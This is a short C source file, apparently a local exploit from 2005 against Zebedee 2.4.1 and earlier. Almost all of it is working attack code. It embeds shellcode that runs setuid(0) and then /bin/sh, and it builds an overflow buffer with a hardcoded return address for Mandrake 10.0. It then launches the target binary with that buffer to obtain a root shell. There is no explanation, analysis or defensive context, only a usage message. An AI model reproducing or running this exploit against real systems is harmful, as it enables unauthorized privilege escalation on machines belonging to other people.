/*

zebedee <= 2.4.1 local sploit
by darkeagle
22.01.05

*/

#include <stdio.h>
#include <string.h>

static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh"; // setuid(0); and exec(/bin/sh) code

int main(int argc, char *argv[])
{
long RET;
char *path;
char buf[14000];

if ( argc < 2 ) { printf("Zebedee local exploit by darkeagle\n\n"); printf("usage: %s <path>\n", argv[0]); exit(0); }

path = argv[1];
RET = 0xbffff910; // mandrake 10.0 OR

memset(buf, 0x00, sizeof(buf));
memset(buf, 0x43, 2000);

sprintf(buf+2000, "%s", shellcode);
*(long*)&buf[1052] = RET;
execl(path, path, buf, NULL);

return 0;

}